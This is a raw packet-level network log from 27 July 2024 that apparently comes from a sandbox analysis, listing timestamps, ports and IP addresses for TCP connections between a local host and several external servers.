Jul 27, 2024 07:44:10.749298096 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.749313116 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.749321938 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.749357939 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.776830912 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.776896000 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.776917934 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.776923895 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.776949883 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.777054071 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.777097940 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.777112961 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.777118921 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.777148962 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.818528891 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.820785999 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.820827961 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.820897102 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.820897102 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.820918083 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.821129084 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.829638958 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.829684019 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.829802990 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.829802990 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.829823017 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.829868078 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.839956045 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.840001106 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.840043068 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.840055943 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.840078115 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.840096951 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.840281963 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.840322971 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.840341091 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.840349913 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.840380907 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.840536118 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.840576887 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.840598106 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.840604067 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.840616941 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.840634108 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.840773106 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.840820074 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.840831041 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.840846062 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.840871096 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.840888977 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.864151955 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.864192963 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.864429951 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.864475012 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.864475012 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.864506960 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.864537001 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.864568949 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.907291889 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.907336950 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.907690048 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.907710075 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.914922953 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.914968967 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.915102959 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.915102959 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.915123940 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.927738905 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.927782059 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.927830935 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.927855968 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.927872896 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.927952051 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.928002119 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.928014994 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.928023100 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.928065062 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.928296089 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.928348064 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.928376913 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.928383112 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.928395033 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.928533077 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.928579092 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.928589106 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.928606033 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.928637981 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.952163935 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.952200890 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.952336073 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.952336073 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.952358961 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.952375889 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.952425003 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.952581882 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.952581882 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.952604055 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.994682074 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.994719982 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:10.994965076 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.994965076 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:10.994987965 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.002487898 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.002535105 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.002657890 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.002657890 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.002682924 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.015809059 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.015846968 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.015968084 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.015968084 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.015989065 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.016103983 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.016149044 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.016194105 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.016201019 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.016236067 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.016370058 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.016410112 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.016432047 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.016438007 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.016464949 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.016602039 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.016649961 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.016661882 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.016675949 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.016705990 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.040400028 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.040436983 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.040564060 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.040564060 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.040585995 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.040729046 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.040771961 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.040879965 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.040879965 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.040903091 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.082269907 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.082309961 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.082402945 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.082417011 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.082456112 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.090220928 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.090265036 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.090410948 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.090410948 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.090430975 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.104804039 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.104845047 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.104897976 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.104918003 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.104933977 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.105123997 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.105181932 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.105197906 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.105206013 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.105238914 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.105689049 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.105746984 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.105755091 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.105792046 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.105856895 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.105902910 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.115276098 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.115293026 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.115329027 CEST	62252	443	192.168.2.4	185.149.100.242
Jul 27, 2024 07:44:11.115334988 CEST	443	62252	185.149.100.242	192.168.2.4
Jul 27, 2024 07:44:11.221666098 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:11.221834898 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:11.221884012 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:11.238121986 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:11.238142967 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:11.238162041 CEST	62254	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:11.238168955 CEST	443	62254	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:11.350261927 CEST	62255	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:11.350289106 CEST	443	62255	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:11.350343943 CEST	62255	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:11.350707054 CEST	62255	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:11.350716114 CEST	443	62255	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:11.533269882 CEST	62256	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:11.538655043 CEST	80	62256	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:11.538750887 CEST	62256	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:11.538995028 CEST	62256	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:11.538995028 CEST	62256	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:11.544114113 CEST	80	62256	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:11.544162989 CEST	80	62256	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:11.993654966 CEST	443	62255	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:11.994371891 CEST	62255	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:11.996510029 CEST	62255	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:11.996526003 CEST	443	62255	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:11.996692896 CEST	62255	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:11.996695995 CEST	443	62255	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:11.996917009 CEST	443	62255	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:11.997317076 CEST	62255	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:12.044540882 CEST	443	62255	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:12.576324940 CEST	80	62256	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:12.576395035 CEST	80	62256	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:12.576574087 CEST	62256	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:12.591590881 CEST	62256	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:12.596612930 CEST	80	62256	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:12.615124941 CEST	62257	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:12.621684074 CEST	80	62257	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:12.621762991 CEST	62257	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:12.621900082 CEST	62257	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:12.621900082 CEST	62257	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:12.626993895 CEST	80	62257	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:12.627072096 CEST	80	62257	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:13.521066904 CEST	443	62255	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:13.521241903 CEST	443	62255	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:13.521354914 CEST	62255	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:13.545536041 CEST	62255	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:13.545562029 CEST	443	62255	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:13.545581102 CEST	62255	443	192.168.2.4	107.173.160.139
Jul 27, 2024 07:44:13.545589924 CEST	443	62255	107.173.160.139	192.168.2.4
Jul 27, 2024 07:44:13.658269882 CEST	62258	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:13.658349991 CEST	443	62258	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:13.658436060 CEST	62258	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:13.659068108 CEST	62258	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:13.659110069 CEST	443	62258	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:13.663949013 CEST	80	62257	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:13.663991928 CEST	80	62257	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:13.664052963 CEST	62257	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:13.664211035 CEST	62257	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:13.666369915 CEST	62259	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:13.669045925 CEST	80	62257	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:13.671325922 CEST	80	62259	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:13.671453953 CEST	62259	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:13.671597004 CEST	62259	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:13.671638012 CEST	62259	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:13.676475048 CEST	80	62259	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:13.676533937 CEST	80	62259	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:14.329500914 CEST	443	62258	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:14.329724073 CEST	62258	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:14.334147930 CEST	62258	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:14.334202051 CEST	443	62258	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:14.334284067 CEST	62258	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:14.334296942 CEST	443	62258	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:14.334557056 CEST	443	62258	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:14.334744930 CEST	62258	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:14.376570940 CEST	443	62258	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:14.727499008 CEST	80	62259	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:14.727555990 CEST	80	62259	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:14.727735996 CEST	62259	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:14.727828979 CEST	62259	80	192.168.2.4	186.145.236.93
Jul 27, 2024 07:44:14.732901096 CEST	80	62259	186.145.236.93	192.168.2.4
Jul 27, 2024 07:44:14.743659019 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:14.743700027 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:14.743777990 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:14.744185925 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:14.744201899 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.313951969 CEST	443	62258	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:15.314342022 CEST	443	62258	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:15.314629078 CEST	62258	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:15.423230886 CEST	62258	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:15.423297882 CEST	443	62258	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:15.423336983 CEST	62258	443	192.168.2.4	167.235.128.153
Jul 27, 2024 07:44:15.423353910 CEST	443	62258	167.235.128.153	192.168.2.4
Jul 27, 2024 07:44:15.471591949 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.471719980 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.473685026 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.473714113 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.474143982 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.477652073 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.524502993 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.537286997 CEST	62261	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:15.537358999 CEST	443	62261	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:15.537432909 CEST	62261	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:15.537827969 CEST	62261	443	192.168.2.4	107.173.160.137
Jul 27, 2024 07:44:15.537858963 CEST	443	62261	107.173.160.137	192.168.2.4
Jul 27, 2024 07:44:15.735537052 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.786863089 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.804269075 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.804305077 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.804481030 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.804528952 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.804589987 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.804590940 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.804590940 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.804590940 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.804631948 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.804651022 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.804680109 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.804713964 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.840607882 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.842113972 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.842169046 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.844244957 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.844278097 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.844331026 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.920617104 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.920675993 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.920937061 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.920965910 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.921020985 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.933049917 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.933090925 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.933223963 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.933223963 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.933233023 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.933281898 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.934559107 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.934597969 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.934629917 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.934636116 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.934662104 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.934684992 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.989443064 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.989528894 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.989564896 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.989581108 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:15.989727020 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:15.989727020 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:16.012939930 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:16.012995958 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:16.013216972 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:16.013247013 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:16.013571024 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:16.025778055 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:16.025835037 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:16.025868893 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:16.025886059 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:16.025909901 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:16.025934935 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:16.026273012 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:16.026335001 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:16.026340961 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:16.026418924 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:16.026422977 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:16.026438951 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:16.026467085 CEST	62260	443	192.168.2.4	162.0.235.84
Jul 27, 2024 07:44:16.026467085 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:16.026484013 CEST	443	62260	162.0.235.84	192.168.2.4
Jul 27, 2024 07:44:16.063402891 CEST	62262	80	192.168.2.4	186.145.236.93
